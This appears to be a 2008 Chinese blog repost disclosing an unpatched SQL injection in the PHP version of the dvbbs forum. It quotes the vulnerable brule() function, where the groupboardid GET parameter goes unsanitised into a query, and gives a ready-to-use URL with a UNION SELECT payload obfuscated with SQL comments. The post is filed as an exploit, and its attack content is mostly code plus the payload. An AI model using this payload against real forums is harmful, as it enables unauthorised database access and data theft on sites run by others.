dvbbs之PHP版本0day

    [雨 March 13, 2008 15:31 | by ]
来源:鬼仔's Blog
PS:在鬼仔那看到的,未测试。。
相关代码:
function brule() {
  global $dv,$db,$boardid,$lang,$groupboardid;
  $groupboardid=$_GET['groupboardid'];
  if(!empty($_GET['groupboardid'])){
    $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");  
  }
  else{
    $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");  
  }

直接获得变量groupboardid,不为空就直接带入查询导致注入。

测试:
http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*

Tags: , , , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(7387)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive